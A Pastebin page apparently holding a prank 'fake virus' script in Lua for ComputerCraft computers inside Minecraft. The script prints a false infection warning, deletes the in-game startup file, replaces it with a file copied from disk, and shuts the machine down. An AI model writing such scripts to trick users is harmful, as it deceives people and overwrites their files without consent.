Advertisement
daanh432

ComputerCraft code fake virus

May 4th, 2016
106
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.25 KB | None | 0 0
  1. term.clear()
  2. print ("Your computer has been Infected..Shutting down..")
  3. if fs.exists("startup") == true then
  4. fs.delete("startup")
  5. fs.copy("disk/Dark","startup")
  6. sleep(2)
  7. os.shutdown()
  8. else
  9. fs.copy("disk/Dark","startup")
  10. sleep(2)
  11. os.shutdown()
  12. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement